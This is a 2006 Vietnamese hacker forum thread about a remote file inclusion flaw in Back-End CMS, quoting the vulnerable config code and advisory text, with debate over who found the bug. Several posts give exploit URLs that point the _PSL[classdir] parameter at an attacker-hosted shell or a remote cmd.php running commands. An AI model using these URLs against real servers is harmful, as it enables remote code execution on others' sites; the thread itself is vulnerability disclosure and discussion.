[Announcement] Back-End (BE_config.php) - Remote Include Files |
28/06/2006 00:14:55 (+0700) | #1 | 1474 |
mrdung
Member
|
0 |
|
|
Joined: 20/03/2005 18:24:46
Messages: 12
Location: congdongtinhoc.com
Offline
|
|
Back-End (BE_config.php) - Remote Include Files
--------------------------------------------------------------------------------
Script:Back-End CMS <= 0.7.2.1
Found by : n2dung@gmail.com
Homepage: http://back-end.org
<?php
// $Id: BE_config.php,v 1.147 2005/06/22 20:40:33 mgifford Exp $
/**
* Back-End configuration file
*
* @package Back-End
* @version 0.7 $Id: BE_config.php,v 1.147 2005/06/22 20:40:33 mgifford Exp $
* @copyright Copyright (C) 2003 OpenConcept Consulting
*
* This file is part of Back-End.
*
* Back-End is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* Back-End is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with Back-End; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');
http://www.example.com/BE_config.php?_PSL[classdir]=http://www.attachker/shell.php_?
|
|
|
|
|
[Question] Re: Back-End (BE_config.php) - Remote Include Files |
29/06/2006 00:06:36 (+0700) | #2 | 1779 |
|
bebihochack
Member
|
0 |
|
|
Joined: 28/06/2006 12:24:58
Messages: 6
Offline
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
29/06/2006 00:15:17 (+0700) | #3 | 1783 |
Topic : Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability
ExploitAlert Id : 633
Credit : Kacper
Date : 27.5.2006
Download
Exploit Code :
################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
# Back-End CMS - Remote File Include Vulnerabilities
# Find by Kacper (Rahim).
# Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
# Site of script: http://www.back-end.org
#
####################################################################
*/
BE_config.php Line 27-31:
Code:
...
// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');
$scriptTimer = & pslSingleton('phpTimer');
$scriptTimer->start('main');
/* Use Example
...
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]
#Elo
ExploitAlert Id : 633
Credit : Kacper
http://securityreason.com/exploitalert/633
Date : 27.5.2006
Bạn Dũnglà chủ nhân hồi nào vậy? |
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
29/06/2006 00:27:09 (+0700) | #4 | 1790 |
Ngoài ra còn 1 lỗi nữa nè
# jpcache.php: line 40
#
# ---
# $includedir = $_PSL['classdir'] . "/jpcache";
# ---
#
# Proof of concept:
#
# Back-end have a default path pre-set on jpcache.php,
# and cracker can execute a remote command.
#
# http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname
|
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
29/06/2006 03:15:08 (+0700) | #5 | 1832 |
|
phamquoc_truong
Elite Member
|
0 |
|
|
Joined: 04/04/2004 07:54:12
Messages: 79
Location: PeaceWorld
Offline
|
|
Thế cái này là do thành viên của HVA phát hiện ra à ???? |
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
29/06/2006 06:51:57 (+0700) | #6 | 1906 |
xemcongaitam
Member
|
0 |
|
|
Joined: 28/06/2006 09:43:53
Messages: 1
Offline
|
|
thành viên hva hay là hacker ngoại ? |
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
29/06/2006 07:33:32 (+0700) | #7 | 1921 |
mrdung
Member
|
0 |
|
|
Joined: 20/03/2005 18:24:46
Messages: 12
Location: congdongtinhoc.com
Offline
|
|
H0angY3nXinhdep wrote:
Topic : Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability
ExploitAlert Id : 633
Credit : Kacper
Date : 27.5.2006
Download
Exploit Code :
################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
# Back-End CMS - Remote File Include Vulnerabilities
# Find by Kacper (Rahim).
# Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
# Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
# Site of script: http://www.back-end.org
#
####################################################################
*/
BE_config.php Line 27-31:
Code:
...
// Script timer
require_once($_PSL['classdir'] . '/BE_phpTimer.class');
$scriptTimer = & pslSingleton('phpTimer');
$scriptTimer->start('main');
/* Use Example
...
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.site.com/[Back-End_path]/BE_config.php?_PSL[classdir]=[evil_scripts]
#Elo
ExploitAlert Id : 633
Credit : Kacper
http://securityreason.com/exploitalert/633
Date : 27.5.2006
Bạn Dũnglà chủ nhân hồi nào vậy?
Ôi sorry! Thực lòng bug này cũng do mình hunt thực và post tai đây:
http://forum.milw0rm.com/viewtopic.php?p=1531
Và củng public tại vniss. |
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
29/06/2006 07:51:52 (+0700) | #8 | 1925 |
+Newbie+
Member
|
0 |
|
|
Joined: 26/06/2006 01:24:42
Messages: 25
Location: Cần Thơ
Offline
|
|
) kinh thât nhể .. Thế mà
Script:Back-End CMS <= 0.7.2.1
Found by : n2dung@gmail.com
Homepage: http://back-end.org
làm mình cứ ngở |
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
29/06/2006 08:50:00 (+0700) | #9 | 1945 |
hellier
Member
|
0 |
|
|
Joined: 26/06/2006 21:01:53
Messages: 3
Offline
|
|
hix sao các bạn lại thía,việc 1 người Việt tìm dc bug đâu phải là chuyện động trời,đừng tự ti quá chứ |
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
29/06/2006 13:39:08 (+0700) | #10 | 2024 |
Chẳng ai tự ti cả, VN có hàng tá người phát hiện bug ý chứ, tuy nhiên phát hiện thật thì phải công bố và credit rõ ràng lên securityfocus hay tracker để mọi người kiểm chứng |
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
29/06/2006 20:44:52 (+0700) | #11 | 2076 |
kilua_vniss
Member
|
0 |
|
|
Joined: 26/06/2006 00:52:49
Messages: 16
Offline
|
|
bug nè thì có j` đâu mà ko phát hiện được cơ chứ nhỉ ,kiddy như em ngồi 1 lúc view code còn phát hiện được mà , thật ra vn cũng có lắm người tìm ra bug lắm , but họ ko public thui mà , |
|
|
|
|
[Question] Re: Back-End (BE_config.php) - Remote Include Files |
29/06/2006 21:11:18 (+0700) | #12 | 2081 |
quanlytruong
Administrator
|
Joined: 01/01/2001 19:49:46
Messages: 204
Offline
|
|
Nếu bug không phải do chính thành viên HVA tìm ra mà post trong box này thì vi phạm 2 chuyện:
- post không đúng box
- không tôn trọng vấn đề bản quyền.
Nếu tái phạm, account sẽ bị vô hiệu hóa. |
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
30/06/2006 01:55:23 (+0700) | #13 | 2184 |
Mr An Luong
Member
|
0 |
|
|
Joined: 28/06/2006 11:55:16
Messages: 12
Location: TP HCM
Offline
|
|
nì, mấy bác đưa BUG ra luôn, chỉ cách khai thác luôn ... quá tuyệt !
Nhưng sao không có bác nào giải thích rõ hơn ý nghĩa của cái BUG nì hết vậy ....!???? |
|
|
|
|
[Question] Re: Back-End (BE_config.php) - Remote Include Files |
30/06/2006 05:26:00 (+0700) | #14 | 2260 |
184
Member
|
0 |
|
|
Joined: 14/02/2004 04:27:34
Messages: 99
Location: Bộ Quốc Phòng
Offline
|
|
BUG này ác chiến thật |
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
30/06/2006 11:40:29 (+0700) | #15 | 2433 |
mrdung
Member
|
0 |
|
|
Joined: 20/03/2005 18:24:46
Messages: 12
Location: congdongtinhoc.com
Offline
|
|
H0angY3nXinhdep wrote:
Chẳng ai tự ti cả, VN có hàng tá người phát hiện bug ý chứ, tuy nhiên phát hiện thật thì phải công bố và credit rõ ràng lên securityfocus hay tracker để mọi người kiểm chứng
OK, nói chung dungit chỉ thường hay sinh hoạt tai http://milw0rm.com nên post tại đó, và bug thuộc dạng này thì qua đơn giản để hunt thôi, bên mục 'thảo luận bảo mật' mình củng post nguyên nhân rồi, vì nó là 1 trong những bug mình thấy thì mình post lên đây thôi, chứ có gì đâu. Chuyện trùng nhau thì tình cờ, sao các bạn lại trách mình ghê thế ?( Vã lại mình hoàn toàn hiểu nguên nhân gân ra bug thuộc dạng này và nguyên nhân xãy ra exploit thì có gì mà mình phải đi lấy của người khác chứ)... |
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
02/07/2006 07:39:04 (+0700) | #16 | 3037 |
|
dexxa
Member
|
0 |
|
|
Joined: 01/07/2006 20:35:01
Messages: 121
Offline
|
|
Bug tuyệt quá .. Thanks anh |
|
|
|
|
[Question] Back-End (BE_config.php) - Remote Include Files |
27/09/2006 02:52:13 (+0700) | #17 | 26003 |
Nowhereman
Elite Member
|
0 |
|
|
Joined: 19/11/2003 06:25:42
Messages: 108
Offline
|
|
Người tìm được Bug, hay là Bug đã được reported theo mình khi trình bày tác giả nên trình bày một cách rõ ràng mấy điểm chính sau :
1 - Lỗi bug, Versionx.x nếu có thể và TÁC GIẢ
2- Trạng thái bugs, Reported or not yet ? or what ?
3- Phân tích NGUYÊN Nhân bugs ( nếu có thể ) .
4- Đưa ra những ví dụ cụ thể nếu có .
5- Đưa ra những phương án giải quyết Vấn đề ( nếu có thể ) .
Chánh tình trạng copy and paste giải thích quá ngắn gọn làm mọi người không rõ vấn đề gây nên nhưng câu hỏi tiếp theo của các thành viên không mấy liên quan tới chủ đề tác giả muốn đưa ra .
Thân .
|
|
lang thang vẫn mãi không nhà
đôi chân lê bước thê lương tháng ngày
càng đi càng thấy đắm say
tình thương con Chúa lòng này chẳng phai
thời gian cứ mãi miệt mài
lang thang đi tiếp ....rồi bay lên z ời
cúi đầu con lạy Ông Trời
xin thươn |
|
|